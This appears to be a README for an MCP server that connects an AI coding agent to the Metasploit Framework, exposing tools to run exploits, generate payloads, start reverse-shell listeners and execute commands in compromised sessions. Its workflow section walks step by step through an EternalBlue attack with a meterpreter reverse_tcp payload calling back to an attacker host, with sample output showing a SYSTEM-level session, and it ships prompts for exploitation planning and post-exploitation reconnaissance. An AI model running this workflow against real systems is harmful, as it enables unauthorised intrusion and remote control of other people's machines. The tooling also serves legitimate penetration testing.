Share
## https://sploitus.com/exploit?id=093B2387-CEEC-59D2-8971-57C35E287F2F
# metasploit-mcp
Metasploit Framework MCP server for exploit execution, session management, and payload generation via the Model Context Protocol.
## Requirements
- Python 3.10+
- [uv](https://github.com/astral-sh/uv)
- [msfrpcd](https://docs.metasploit.com/docs/using-metasploit/intermediate/rpc/how-to-use-msfrpc.html) running and reachable
## Quick Start
Start msfrpcd:
```bash
msfrpcd -P msf -S -a 127.0.0.1
```
Run the server:
```bash
MSF_PASSWORD=msf uv run server.py
```
Or with SSE transport (for containerized / remote deployment):
```bash
MSF_PASSWORD=msf MCP_TRANSPORT=sse PORT=3007 uv run server.py
```
Add to `.mcp.json` for Claude Code:
```json
{
"metasploit-mcp": {
"command": "uv",
"args": ["run", "/path/to/metasploit-mcp/server.py"],
"cwd": "/path/to/metasploit-mcp",
"env": {
"MSF_PASSWORD": "msf"
}
}
}
```
The server verifies msfrpcd is reachable at startup and exits with a clear error if the connection fails.
## Transport
| Env Var | Default | Description |
|---------|---------|-------------|
| `MCP_TRANSPORT` | `stdio` | Transport mode: `stdio` or `sse` |
| `HOST` | `0.0.0.0` | Bind address (SSE mode) |
| `PORT` | `3007` | Listen port (SSE mode) |
## Configuration
| Env Var | Default | Description |
|---------|---------|-------------|
| `MSF_PASSWORD` | `msf` | msfrpcd authentication password |
| `MSF_SERVER` | `127.0.0.1` | msfrpcd host address |
| `MSF_PORT` | `55553` | msfrpcd port |
| `MSF_SSL` | `true` | Use SSL for RPC connection (`false` for localhost) |
| `PAYLOAD_SAVE_DIR` | `/tmp/msf-payloads` | Directory for generated payload files |
## Tools
### Modules (2)
| Tool | Description |
|------|-------------|
| `search_modules` | Search modules by name, CVE, or keyword |
| `module_info` | Get detailed module info: options, references, targets, compatible payloads |
### Exploitation (3)
| Tool | Description |
|------|-------------|
| `run_exploit` | Run an exploit module against a target (RPC async or console sync) |
| `run_auxiliary` | Run an auxiliary module (scanner, fuzzer, etc.) |
| `run_post` | Run a post-exploitation module against an active session |
### Payloads (1)
| Tool | Description |
|------|-------------|
| `generate_payload` | Generate a payload file server-side (ELF, EXE, raw, etc.) |
### Sessions (3)
| Tool | Description |
|------|-------------|
| `list_sessions` | List active sessions with type, target, and tunnel info |
| `session_command` | Execute a command in a meterpreter or shell session |
| `close_session` | Terminate an active session |
### Handlers & Jobs (3)
| Tool | Description |
|------|-------------|
| `start_handler` | Start a multi/handler listener for reverse connections |
| `list_jobs` | List all active background jobs |
| `stop_job` | Stop a running background job |
## Workflow
```
1. search_modules(query="eternalblue")
2. module_info(type="exploit", name="windows/smb/ms17_010_eternalblue")
3. start_handler(payload="windows/x64/meterpreter/reverse_tcp", lhost="10.0.0.1", lport=4444)
4. run_exploit(
module="windows/smb/ms17_010_eternalblue",
options="RHOSTS=10.0.0.5",
payload="windows/x64/meterpreter/reverse_tcp",
payload_options="LHOST=10.0.0.1,LPORT=4444"
)
5. list_sessions()
6. session_command(session_id=1, command="sysinfo")
7. run_post(module="multi/gather/env", session_id=1)
-- Cleanup --
8. close_session(session_id=1)
9. stop_job(job_id=0)
```
## Output Format
### run_exploit (console mode)
```json
{
"module": "exploit/windows/smb/ms17_010_eternalblue",
"output": "[*] Started reverse TCP handler on 10.0.0.1:4444\n[*] 10.0.0.5:445 - Executing...\n[+] 10.0.0.5:445 - ETERNALBLUE overwrite completed\n[*] Meterpreter session 1 opened",
"status": "session_opened",
"session_id": 1,
"label": "exploit-2026-03-04T..."
}
```
### list_sessions
```json
[
{
"session_id": 1,
"type": "meterpreter",
"info": "NT AUTHORITY\\SYSTEM @ WIN-TARGET",
"tunnel_local": "10.0.0.1:4444",
"tunnel_peer": "10.0.0.5:49152",
"via_exploit": "exploit/windows/smb/ms17_010_eternalblue",
"via_payload": "payload/windows/x64/meterpreter/reverse_tcp",
"target_host": "10.0.0.5",
"platform": "windows",
"arch": "x64"
}
]
```
### generate_payload
```json
{
"path": "/tmp/msf-payloads/linux_x64_shell_reverse_tcp.elf",
"size_bytes": 194,
"format": "elf",
"payload": "linux/x64/shell_reverse_tcp",
"label": "payload-2026-03-04T..."
}
```
### search_modules
```json
[
{
"type": "exploit",
"name": "windows/smb/ms17_010_eternalblue",
"fullname": "exploit/windows/smb/ms17_010_eternalblue"
},
{
"type": "auxiliary",
"name": "scanner/smb/smb_ms17_010",
"fullname": "auxiliary/scanner/smb/smb_ms17_010"
}
]
```
## Resources
- `msf://status` -- RPC connection status, version, active jobs and sessions count
- `msf://sessions` -- all active sessions with details
- `msf://payloads` -- all generated payloads in the registry
## Prompts
- `exploit_planning` -- plan exploitation approach based on target and discovered services
- `post_recon` -- post-exploitation reconnaissance on an active session
## Security
- Module names validated against strict alphanumeric/slash/hyphen/underscore regex
- Session IDs validated as integers and checked against active session list
- Payload filenames sanitized (non-alphanumeric characters replaced with underscores)
- Save directory is server-controlled, not user-specified
- All execution goes through msfrpcd RPC, no subprocess calls with user input
- `MSF_SSL=false` only intended for localhost; defaults to `true` for remote connections